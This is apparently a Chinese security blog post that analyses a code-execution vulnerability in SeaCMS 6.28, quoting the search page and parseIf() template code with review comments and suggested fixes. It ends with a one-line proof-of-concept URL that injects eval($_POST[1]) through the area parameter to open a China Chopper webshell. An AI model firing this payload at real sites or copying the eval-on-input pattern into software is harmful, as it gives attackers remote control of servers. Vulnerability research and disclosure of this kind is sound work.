海洋CMS 版本 6.28 代码执行漏洞,很早之前挖的,网上已经被曝了,发出来当学习吧
漏洞文件:seacms/search.php
/**
 * Render the front-end search / cascade-filter page and echo it.
 *
 * Every input is read from globals ($searchtype, $searchword, $tid, $year,
 * $letter, $area, $yuyan, $state, $ver, $order, $jq, $money, $page). The
 * PoC on this page passes `area` as a query-string parameter, so these are
 * presumably request-controlled - confirm in search.php. The function
 * builds a COUNT(*) WHERE clause by string interpolation (no escaping is
 * visible here), loads the template part (optionally from the file cache),
 * substitutes the raw filter values into the template text and finally
 * hands the text to $mainClassObj->parseIf(), which evaluates `{if:...}`
 * conditions with eval(). An unescaped value substituted here that lands
 * inside a template condition is therefore executed as PHP.
 *
 * Output is echoed; nothing is returned.
 */
function echoSearchPage() {
    // All filter values are globals; presumably populated from the request
    // by search.php (the PoC on this page passes `area` as a query parameter) - confirm.
    global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;
    // `time` is a bare undefined constant, not time(): PHP 7 warns and uses the
    // string "time", PHP 8 throws Error. Presumably 'time' was intended.
    $order = !empty($order)?$order:time;
    if(intval($searchtype)==5) {
        // Cascade (multi-filter) mode: template cascade.html.
        $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";
        $typeStr = !empty($tid)?intval($tid).'_':'0_';
        $yearStr = !empty($year)?PinYin($year).'_':'0_';
        $letterStr = !empty($letter)?$letter.'_':'0_';
        $areaStr = !empty($area)?PinYin($area).'_':'0_';
        $orderStr = !empty($order)?$order.'_':'0_';
        $jqStr = !empty($jq)?$jq.'_':'0_';
        // Cache key covers type/year/letter/area/order only: $jqStr is computed
        // but never used, and $yuyan/$state/$ver/$money are not part of the key.
        // Whether parseSearchPart()'s output depends on them cannot be seen here.
        $cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;
        $pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");
    }else {
        // Keyword search: the search-frequency check runs on the first page only.
        if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);
        $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";
        $cacheName="parse_search_";
        $pSize = getPageSizeOnCache($searchTemplatePath,"search","");
    }
    if (empty($pSize)) $pSize=12;
    // The WHERE clause is assembled by interpolating the raw filter values.
    // No escaping happens in this function; whether $dsql or search.php
    // escapes them beforehand is not visible here.
    switch (intval($searchtype)) {
        case -1: $whereStr=" where v_recycled=0 and (v_name like '%$searchword%' or v_actor like '%$searchword%' or v_director like '%$searchword%' or v_publisharea like '%$searchword%' or v_publishyear like '%$searchword%' or v_letter='$searchword' or v_tags='$searchword' or v_nickname like '%$searchword%')"; break;
        case 0: $whereStr=" where v_recycled=0 and v_name like '%$searchword%'"; break;
        case 1: $whereStr=" where v_recycled=0 and v_actor like '%$searchword%'"; break;
        case 2: $whereStr=" where v_recycled=0 and v_publisharea like '%$searchword%'"; break;
        case 3: $whereStr=" where v_recycled=0 and v_publishyear like '%$searchword%'"; break;
        case 4: $whereStr=" where v_recycled=0 and v_letter='".strtoupper($searchword)."'"; break;
        case 5: $whereStr=" where v_recycled=0";
            // $tid is intval()'d only for the cache key; here it is embedded raw in FIND_IN_SET.
            if(!empty($tid)) $whereStr.=" and (tid in (".getTypeId($tid).") or FIND_IN_SET('".$tid."',v_extratype)<>0)";
            if($year=="more") {
                // Lines of publishyear.txt are joined straight into the NOT IN list;
                // file() keeps trailing newlines unless FILE_IGNORE_NEW_LINES is passed.
                $publishyeartxt=sea_DATA."/admin/publishyear.txt";
                $publishyear = array();
                if(filesize($publishyeartxt)>0) { $publishyear = file($publishyeartxt); }
                $yearArray=$publishyear;
                $yeartxt= implode(',',$yearArray);
                $whereStr.=" and v_publishyear not in ($yeartxt)";
            }
            if(!empty($year) AND $year!="more") {$whereStr.=" and v_publishyear='$year'";}
            if($letter=="0-9") {$whereStr.=" and v_letter in ('0','1','2','3','4','5','6','7','8','9')";}
            if(!empty($letter) AND $letter!="0-9") {$whereStr.=" and v_letter='$letter'";}
            if(!empty($area)) $whereStr.=" and v_publisharea='$area'";
            if(!empty($yuyan)) $whereStr.=" and v_lang='$yuyan'";
            if(!empty($jq)) $whereStr.=" and v_jq like'%$jq%'";
            if($state=='l') $whereStr.=" and v_state !=0";
            if($state=='w') $whereStr.=" and v_state=0";
            if($money=='s') $whereStr.=" and v_money !=0";
            if($money=='m') $whereStr.=" and v_money=0";
            if(!empty($ver)) $whereStr.=" and v_ver='$ver'";
            break;
    }
    // Only the row count is queried here; the item list itself is rendered
    // by parseSearchPart() / $mainClassObj (not visible in this listing).
    $sql="select count(*) as dd from sea_data ".$whereStr;
    $row = $dsql->GetOne($sql);
    if(is_array($row)) { $TotalResult = $row['dd']; } else { $TotalResult = 0; }
    $pCount = ceil($TotalResult/$pSize);
    if($cfg_iscache){
        if(chkFileCache($cacheName)){ $content = getFileCache($cacheName); }else{ $content = parseSearchPart($searchTemplatePath); setFileCache($cacheName,$content); }
    }else{ $content = parseSearchPart($searchTemplatePath); }
    // Raw values go into the template text here, before parseIf() runs on it.
    $content = str_replace("{searchpage:page}",$page,$content);
    $content = str_replace("{seacms:searchword}",$searchword,$content);
    $content = str_replace("{seacms:searchnum}",$TotalResult,$content);
    $content = str_replace("{searchpage:ordername}",$order,$content);
    // Sort links: every filter value is embedded in the URL without
    // urlencode()/htmlspecialchars(), so the links reflect the inputs verbatim.
    $content = str_replace("{searchpage:order-hit-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hit&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-hitasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hitasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-id-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=id&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-idasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=idasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-time-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=time&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-timeasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=timeasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-commend-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commend&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-commendasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commendasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-score-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=score&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    $content = str_replace("{searchpage:order-scoreasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=scoreasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    if(intval($searchtype)==5) {
        // Empty filters are displayed as '全部' ("all"); non-empty ones are
        // substituted raw. Because parseIf() below evaluates `{if:...}`
        // conditions with eval(), a filter value that contains template syntax
        // is executed as PHP - this is the code-execution path reported on this
        // page (the PoC uses `area`). The fix belongs in parseIf() (no eval) and,
        // defensively, in validating these values against an allow-list here.
        $tname = !empty($tid)?getTypeNameOnCache($tid):'全部';
        $jq = !empty($jq)?$jq:'全部';
        $area = !empty($area)?$area:'全部';
        $year = !empty($year)?$year:'全部';
        $yuyan = !empty($yuyan)?$yuyan:'全部';
        $letter = !empty($letter)?$letter:'全部';
        $state = !empty($state)?$state:'全部';
        $ver = !empty($ver)?$ver:'全部';
        $money = !empty($money)?$money:'全部';
        $content = str_replace("{searchpage:type}",$tid,$content);
        $content = str_replace("{searchpage:typename}",$tname ,$content);
        $content = str_replace("{searchpage:year}",$year,$content);
        $content = str_replace("{searchpage:area}",$area,$content);
        $content = str_replace("{searchpage:letter}",$letter,$content);
        $content = str_replace("{searchpage:lang}",$yuyan,$content);
        $content = str_replace("{searchpage:jq}",$jq,$content);
        // state/money are mapped to fixed display labels, so they cannot carry arbitrary text.
        if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";}
        if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";}
        $content = str_replace("{searchpage:state}",$state2,$content);
        $content = str_replace("{searchpage:money}",$money2,$content);
        $content = str_replace("{searchpage:ver}",$ver,$content);
        $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade");
        $content=$mainClassObj->parseSearchItemList($content,"type");
        $content=$mainClassObj->parseSearchItemList($content,"year");
        $content=$mainClassObj->parseSearchItemList($content,"area");
        $content=$mainClassObj->parseSearchItemList($content,"letter");
        $content=$mainClassObj->parseSearchItemList($content,"lang");
        $content=$mainClassObj->parseSearchItemList($content,"jq");
        $content=$mainClassObj->parseSearchItemList($content,"state");
        $content=$mainClassObj->parseSearchItemList($content,"ver");
        $content=$mainClassObj->parseSearchItemList($content,"money");
    }else {
        $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search");
    }
    // -444: the meaning of this sentinel is not visible in this listing.
    $content=replaceCurrentTypeId($content,-444);
    $content=$mainClassObj->parseIf($content); // this function is the cause; let's trace into it (parseIf, below)
    $content=str_replace("{seacms:member}",front_member(),$content);
    $searchPageStr = $content;
    echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ;
}
parseif函数路径:/include/main.class.php
/**
 * Expand template conditionals of the form
 * `{if:COND}THEN{elseif:COND2}THEN2{else}ELSE{end if}` inside $content.
 *
 * Each COND is taken verbatim from the template text (a regex capture,
 * passed through $this->parseStrIf(), whose behaviour is not visible here)
 * and spliced into a PHP statement that is run with @eval(). Nothing in
 * this method restricts what COND may contain, so a caller that has
 * substituted unescaped external input into $content before calling this
 * (see echoSearchPage() above) allows arbitrary PHP execution. The durable
 * fix is a restricted condition evaluator (tokenise the comparison and
 * evaluate it without eval), not more escaping at the call sites. As a
 * detection signal, template syntax such as `{if:` arriving in request
 * parameters is worth alerting on.
 *
 * Note on this listing: every `\$` and `\"` inside the eval'd strings
 * appears as `/$` and `/"`, and the method's closing brace is missing; both
 * look like copy/paste artifacts of the original source rather than code.
 *
 * @param string $content template text
 * @return string template text with the conditionals resolved
 */
function parseIf($content){
    if (strpos($content,'{if:')=== false){
        return $content;
    }else{
        $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");
        $labelRule2="{elseif";
        $labelRule3="{else}";
        preg_match_all($labelRule,$content,$iar);
        $arlen=count($iar[0]);
        $elseIfFlag=false;
        // $ifFlag is never initialised; a failed (suppressed) eval leaves it
        // unset or stale from the previous iteration.
        for($m=0;$m<$arlen;$m++){
            $strIf=$iar[1][$m];
            $strIf=$this->parseStrIf($strIf);
            $strThen=$iar[2][$m];
            $strThen=$this->parseSubIf($strThen);
            if (strpos($strThen,$labelRule2)===false){
                // BUG: strpos() returns false when {else} is absent, and
                // false >= 0 is true in PHP, so this branch is always taken and
                // the else-branch below is unreachable. Without {else},
                // $elsearray[1] is unset (null) and the tag expands to "".
                if (strpos($strThen,$labelRule3)>=0){
                    $elsearray=explode($labelRule3,$strThen);
                    $strThen1=$elsearray[0];
                    $strElse1=$elsearray[1];
                    // COND from the template is executed as PHP; errors are @-suppressed.
                    @eval("if(".$strIf."){/$ifFlag=true;}else{/$ifFlag=false;}");
                    if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);}
                    else {$content=str_replace($iar[0][$m],$strElse1,$content);}
                }else{
                    @eval("if(".$strIf.") { /$ifFlag=true;} else{ /$ifFlag=false;}");// this is the spot: @eval
                    if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content);
                    else $content=str_replace($iar[0][$m],"",$content);
                }
            }else{
                // {elseif ...} chain: split the body on "{elseif", then split the
                // last piece on "{else}" to get the final else text as the default.
                $elseIfArray=explode($labelRule2,$strThen);
                $elseIfArrayLen=count($elseIfArray);
                $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);
                $resultStr=$elseIfSubArray[1];
                // Branch bodies are addslashes()'d before being embedded as string
                // literals; the conditions themselves are embedded unescaped.
                $elseIfArraystr0=addslashes($elseIfArray[0]);
                @eval("if($strIf){/$resultStr=/"$elseIfArraystr0/";}");
                for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){
                    $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");
                    $strElseIf=$this->parseStrIf($strElseIf);
                    $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));
                    // Each condition is evaluated twice: once to assign the body, once for the flag.
                    @eval("if(".$strElseIf."){/$resultStr=/"$strElseIfThen/";}");
                    @eval("if(".$strElseIf."){/$elseIfFlag=true;}else{/$elseIfFlag=false;}");
                    if ($elseIfFlag) {break;}
                }
                $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");
                $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));
                // A lone '=' in the final else-if condition is rewritten to '=='.
                if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0);
                @eval("if(".$strElseIf0."){/$resultStr=/"$strElseIfThen0/";/$elseIfFlag=true;}");
                $content=str_replace($iar[0][$m],$resultStr,$content);
            }
        }
        return $content;
    }
// NOTE(review): the method's closing brace is missing from this listing as pasted.
POC:/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。